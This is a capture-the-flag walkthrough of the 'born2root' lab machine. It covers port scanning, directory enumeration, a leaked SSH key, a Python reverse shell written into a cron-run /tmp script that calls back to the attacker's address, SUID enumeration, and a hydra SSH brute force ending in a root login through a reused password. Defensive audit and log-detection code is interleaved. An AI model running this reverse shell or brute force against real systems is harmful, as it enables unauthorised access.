Writeups

born2root

Index

1. Summary
2. Reconnaissance
3. Vulnerability Analysis
4. Password Attacks
5. Exploitation
6. Post-Exploitation

Summary

This machine was full of rabbit holes. Basic recon came down to sub-directory enumeration.

Reconnaissance

Nmap

Initial scan of all TCP ports:

# Nmap 7.92 scan initiated Sun Jun 19 23:42:31 2022 as: nmap -p- -Pn -oN nmap/allport born2root
Nmap scan report for born2root (192.168.0.102)
Host is up (0.00073s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
57706/tcp open  unknown

# Nmap done at Sun Jun 19 23:42:36 2022 -- 1 IP address (1 host up) scanned in 5.32 seconds

Nmap scan of the open ports with the default scripts and version detection:

# Nmap 7.92 scan initiated Sun Jun 19 23:43:55 2022 as: nmap -Pn -sC -sV -p22,80,111,57706 -oA nmap/script born2root
Nmap scan report for born2root (192.168.0.102)
Host is up (0.0029s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey: 
|   1024 3d:6f:40:88:76:6a:1d:a1:fd:91:0f:dc:86:b7:81:13 (DSA)
|   2048 eb:29:c0:cb:eb:9a:0b:52:e7:9c:c4:a6:67:dc:33:e1 (RSA)
|   256 d4:02:99:b0:e7:7d:40:18:64:df:3b:28:5b:9e:f9:07 (ECDSA)
|_  256 e9:c4:0c:6d:4b:15:4a:58:4f:69:cd:df:13:76:32:4e (ED25519)
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
| http-robots.txt: 2 disallowed entries 
|_/wordpress-blog /files
|_http-title:  Secretsec Company 
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36468/tcp6  status
|   100024  1          47099/udp   status
|   100024  1          52621/udp6  status
|_  100024  1          57706/tcp   status
57706/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 19 23:44:07 2022 -- 1 IP address (1 host up) scanned in 11.92 seconds

Gobuster

Directory scan on port 80:

/.htpasswd            (Status: 403) [Size: 293]
/.htaccess            (Status: 403) [Size: 293]
/.hta                 (Status: 403) [Size: 288]
/files                (Status: 301) [Size: 306] [--> http://born2root/files/]
/icons                (Status: 301) [Size: 306] [--> http://born2root/icons/]
/index.html           (Status: 200) [Size: 5651]
/manual               (Status: 301) [Size: 307] [--> http://born2root/manual/]
/robots.txt           (Status: 200) [Size: 57]
/server-status        (Status: 403) [Size: 297]

Vulnerability Analysis

The /icons subdirectory contained a file VDSoyuAXiO.txt, which turned out to be an SSH private key.

wget http://192.168.0.104/icons/VDSoyuAXiO.txt


Three usernames were listed in the /index.php file; the key above was tried with each of them to get into the server.

Password Attacks

Since three users were listed in /index.php, the key was tried manually against each of them over SSH. The option PubkeyAcceptedKeyTypes=+ssh-rsa had to be added: current OpenSSH clients no longer offer the ssh-rsa signature algorithm by default, and the target's OpenSSH 6.7 server predates the rsa-sha2-* variants, so without it the key is never even offered.

Exploitation

Foothold

The private key above gave a shell on the machine as martin.

martin

Looking at the crontab, there was a Python script, /tmp/sekurity.py, that was executed as the user jimmy. So a Python reverse shell was written to that path to get a shell as jimmy. Script:

import socket,os,pty
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.105",1337))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/sh")

This was saved as /tmp/sekurity.py, with nc listening on port 1337 on the attacking machine.
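The weakness behind that step is a cron job whose script lives in a world-writable directory. The audit below is an added example, not code from the writeup: it parses /etc/crontab-style entries and flags script paths that any local user could create or edit. The sample crontab is constructed (the jimmy line mirrors the job described above); stat_of is injectable so the check can run against a fake filesystem.

```python
import os
import re
import stat

# Constructed /etc/crontab-style sample (m h dom mon dow user command); the jimmy line mirrors the born2root job.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   jimmy   python /tmp/sekurity.py
0 3     * * *   backup  /usr/local/bin/backup.sh /srv/data
"""

ENTRY_RE = re.compile(r"^(?:\S+\s+){5}(\S+)\s+(.+)$")  # five time fields, user, command
PATH_RE = re.compile(r"(?<!\S)(/[^\s;&|]+)")            # absolute paths inside the command

def parse_system_crontab(text):
    """Return [(user, command)] for job lines; comments and VAR=value lines are skipped."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^[A-Za-z_]\w*=", line):
            continue
        m = ENTRY_RE.match(line)
        if m:
            jobs.append((m.group(1), m.group(2)))
    return jobs

def real_stat(path):
    # (mode, uid) of a path on the live system, or None if it does not exist
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return None
    return st.st_mode, st.st_uid

def audit_jobs(jobs, stat_of=real_stat):
    """Flag script paths another local user could plant or edit: a world-writable file, or a
    missing file in a world-writable directory (the /tmp/sekurity.py case: anyone can create it)."""
    findings = []
    for user, command in jobs:
        for path in PATH_RE.findall(command):
            info = stat_of(path)
            if info is None:
                parent = stat_of(os.path.dirname(path))
                if parent and parent[0] & stat.S_IWOTH:
                    findings.append((user, path, "missing; parent directory is world-writable"))
            elif info[0] & stat.S_IWOTH:
                findings.append((user, path, "script is world-writable"))
    return findings
```

Run on a live box with the default stat_of, the /tmp entry is reported because /tmp is world-writable and the script does not exist until someone plants it.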

jimmy

After getting the reverse shell from the cron job, the files in jimmy's home directory were examined. One of them was a binary named networker.

Listing the SUID binaries with find / -perm /4000 2>/dev/null showed /home/jimmy/networker among them, the same file that jimmy could execute:

/sbin/mount.nfs
/bin/umount
/bin/mount
/bin/su
/home/jimmy/networker
/usr/sbin/exim4
/usr/bin/procmail
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

networker was a C program compiled with GCC. Running strings on it gave:

/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
puts
printf
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.1.3
GLIBC_2.0
UWVS
t$,U
[^_]
*** Networker 2.0 *** 
/sbin/ifconfig
/bin/ping -c 1  localhost 
Done 
echo 'echo linux tool version 5' 
;*2$"
GCC: (Debian 6.3.0-12) 6.3.0 20170406
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6578
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
networker.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
__x86.get_pc_thunk.bx
printf@@GLIBC_2.0
_edata
__x86.get_pc_thunk.dx
__cxa_finalize@@GLIBC_2.1.3
__data_start
puts@@GLIBC_2.0
system@@GLIBC_2.0
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_start_main@@GLIBC_2.0
__libc_csu_init
_fp_hw
__bss_start
main
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.dyn
.rel.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment

Among the strings are the commands the binary runs:

/sbin/ifconfig
/bin/ping -c 1  localhost 
Done 
echo 'echo linux tool version 5' 
;*2$"

These commands are invoked by absolute path and take no user input (the binary only pings localhost once), so neither the PATH nor the arguments could be influenced. This was probably not the way to go.
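The reasoning above (absolute paths, no input reaching the command line) can be turned into a quick triage of strings output. This is an added example, not code from the writeup or the machine: it reads the networker strings shown above plus a constructed, hypothetical contrast case, and reports for each command-looking string whether PATH could change what runs and whether a printf placeholder suggests caller input reaches it. Shell builtins such as echo are treated as not PATH-dependent because /bin/sh resolves them internally.

```python
import re

# Excerpt of the strings output shown above for /home/jimmy/networker.
NETWORKER_STRINGS = """\
puts
printf
system
*** Networker 2.0 ***
/sbin/ifconfig
/bin/ping -c 1  localhost
Done
echo 'echo linux tool version 5'
;*2$"
GCC: (Debian 6.3.0-12) 6.3.0 20170406
"""
# Constructed contrast case (hypothetical, not from the binary): a bare program
# name plus a printf placeholder, the two things networker does not have.
HYPOTHETICAL_STRINGS = "system\nping -c 1 %s\n"

EXEC_FUNCS = {"system", "popen", "execvp", "execlp"}      # libc calls that hand a string to a shell or PATH lookup
SH_BUILTINS = {"echo", "cd", "test", "printf", "export"}  # resolved inside /bin/sh, never via PATH
CMD_RE = re.compile(r"^(/\S+|[a-z][a-z0-9_.-]*)(\s|$)")

def looks_like_command(s):
    """Heuristic: an absolute path, or a lower-case word followed by arguments."""
    return bool(CMD_RE.match(s)) and (s.startswith("/") or " " in s)

def triage_suid_strings(text):
    """For each command-looking string answer the two questions that matter for a
    SUID binary calling system(): can PATH change what runs, and can caller input
    reach the command line (printf placeholders)? Mirrors the reasoning above."""
    lines = [l.strip() for l in text.splitlines() if l.strip()]
    report = {"exec_funcs": sorted(set(lines) & EXEC_FUNCS), "commands": []}
    for s in lines:
        if s in EXEC_FUNCS or not looks_like_command(s):
            continue
        prog = s.split()[0]
        report["commands"].append({
            "command": s,
            "path_dependent": not prog.startswith("/") and prog not in SH_BUILTINS,
            "takes_input": bool(re.search(r"%[-0-9.]*[sdxu]", s)),
        })
    report["risky"] = any(c["path_dependent"] or c["takes_input"] for c in report["commands"])
    return report
```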

Next, linpeas.sh was copied to the box to look for a privilege escalation path.

scp was used, because wget and curl on the box had been replaced with dummy scripts.

scp -i id_rsa -o 'PubkeyAcceptedKeyTypes=+ssh-rsa' linpeas.sh [email protected]:/tmp/

and then, as martin on the box:

cd /tmp && chmod 777 linpeas.sh

Running linpeas as jimmy turned up nothing beyond the same networker binary, which could not be exploited.

Post-Exploitation

After several failed attempts to escalate privileges from the foothold, and with no leads from linpeas.sh, enumeration went back to port 80.

There were three users, two of which were already compromised; the remaining one was hadi. From the initial foothold it was clear that hadi could log in over SSH, as there was a .ssh directory in /home/hadi. So filtering rockyou.txt for the keyword hadi and brute-forcing SSH with hydra seemed worth trying.

Ran cat /usr/share/wordlists/rockyou.txt | grep hadi > hadi_refined.txt to collect the candidates related to hadi, then hydra -l hadi -P hadi_refined.txt ssh://born2root -f to brute-force SSH with that wordlist and the username hadi:

hydra -l hadi -P hadi_refined.txt ssh://born2root -f   
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-06-28 22:19:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1581 login tries (l:1/p:1581), ~99 tries per task
[DATA] attacking ssh://born2root:22/
[STATUS] 176.00 tries/min, 176 tries in 00:01h, 1405 to do in 00:08h, 16 active
[22][ssh] host: born2root   login: hadi   password: hadi123
[STATUS] attack finished for born2root (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-06-28 22:20:59

That gave a login on the server with username hadi and password hadi123.
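The hydra run above leaves an unmistakable trace in the target's /var/log/auth.log: a burst of "Failed password" lines from one source, then an "Accepted password". The detector below is an added example, not part of the writeup: it parses sshd syslog lines, alerts when a source exceeds a failure threshold inside a sliding window, and alerts again if that source later succeeds. The log excerpt is constructed, modelled on the timings and addresses above (192.168.0.105 is the attacking box from the reverse shell).

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# sshd lines as Debian writes them to /var/log/auth.log (syslog format, no year).
LOG_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: (Failed|Accepted) password "
                    r"for (?:invalid user )?(\S+) from (\S+) port \d+")

def parse_line(line, year=2022):
    """Return (timestamp, result, user, source_ip), or None for unrelated lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m.group(1)}", "%Y %b %d %H:%M:%S")
    return ts, m.group(2), m.group(3), m.group(4)

def detect_bruteforce(lines, threshold=20, window=60):
    """Alert once per source that racks up `threshold` failed passwords within
    `window` seconds, and again if that source then logs in successfully.
    Hydra above managed 176 tries/min, so 20 in 60 s is a generous bar."""
    recent = defaultdict(deque)   # source ip -> failure timestamps still inside the window
    flagged, alerts = set(), []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, result, user, src = parsed
        if result == "Failed":
            q = recent[src]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window:
                q.popleft()
            if len(q) >= threshold and src not in flagged:
                flagged.add(src)
                alerts.append((src, "ssh brute force", len(q), ts))
        elif src in flagged:   # Accepted after a burst: assume the account is compromised
            alerts.append((src, f"successful login for {user} after brute force", None, ts))
    return alerts

def sample_log():
    """Constructed auth.log excerpt modelled on the hydra run above: roughly three
    failures a second from 192.168.0.105 (the attacking box), one unrelated failure,
    then the eventual success for hadi."""
    base = datetime(2022, 6, 28, 22, 19, 25)
    lines = [f"{base + timedelta(seconds=i // 3):%b %d %H:%M:%S} born2root sshd[{1200 + i}]: "
             f"Failed password for hadi from 192.168.0.105 port {41000 + i} ssh2" for i in range(30)]
    lines.append("Jun 28 22:19:40 born2root sshd[1300]: Failed password for root from 10.0.0.7 port 5000 ssh2")
    lines.append("Jun 28 22:20:58 born2root sshd[1310]: Accepted password for hadi from 192.168.0.105 port 41399 ssh2")
    return lines
```

Feeding the real file works the same way: detect_bruteforce(open("/var/log/auth.log")) iterates the lines directly.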

hadi

Checked for a sudoers misconfiguration with sudo -l, but the shell answered -bash: sudo : commande introuvable (command not found), so sudo was not installed. So su was tried with hadi's own password hadi123, and it worked: root had the same password, and privileges were escalated to root. Voila, it was done.

Finally, pwned the machine!